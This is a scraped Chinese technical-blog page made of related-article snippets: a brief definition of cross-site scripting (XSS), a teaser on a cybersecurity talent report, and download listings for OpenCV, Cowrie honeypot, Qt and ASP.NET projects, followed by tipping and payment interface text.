XSS基础 跨站脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8476
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于opencv实现象棋识别及棋谱定位python源码+数据集-人工智能课程设计
09-27
基于opencv实现象棋识别及棋谱定位python源码+数据集-人工智能课程设计,含有代码注释,满分课程设计资源,新手也可看懂,期末大作业、课程设计、高分必看,下载下来,简单部署,就可以使用。该项目可以作为课程设计期末大作业使用,该系统功能完善、界面美观、操作简单、功能齐全、管理便捷,具有很高的实际应用价值。 基于opencv实现象棋识别及棋谱定位python源码+数据集-人工智能课程设计,含有代码注释,满分课程设计资源,新手也可看懂,期末大作业、课程设计、高分必看,下载下来,简单部署,就可以使用。该项目可以作为课程设计期末大作业使用,该系统功能完善、界面美观、操作简单、功能齐全、管理便捷,具有很高的实际应用价值。 基于opencv实现象棋识别及棋谱定位python源码+数据集-人工智能课程设计,含有代码注释,满分课程设计资源,新手也可看懂,期末大作业、课程设计、高分必看,下载下来,简单部署,就可以使用。该项目可以作为课程设计期末大作业使用,该系统功能完善、界面美观、操作简单、功能齐全、管理便捷,具有很高的实际应用价值。基于opencv实现象棋识别及棋谱定位python源码+数据集
基于Python实现的Cowrie蜜罐设计源码
09-27
该项目为基于Python实现的Cowrie蜜罐设计源码,共计380个文件,涵盖166个Python源代码文件,以及包括RST、SQL、YAML、Markdown等多种类型的配置和文档文件。Cowrie蜜罐是一款用于记录暴力攻击和攻击者执行的SSH及Telnet交互的中等交互式蜜罐。
QT 摄像头获取每一帧图像数据以及opencv获取清晰度
09-27
QT 摄像头获取每一帧图像数据以及opencv获取清晰度
基于asp.net的(CS)地震预测系统设计与实现.docx
最新发布
09-27
基于asp.net的(CS)地震预测系统设计与实现.docx
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值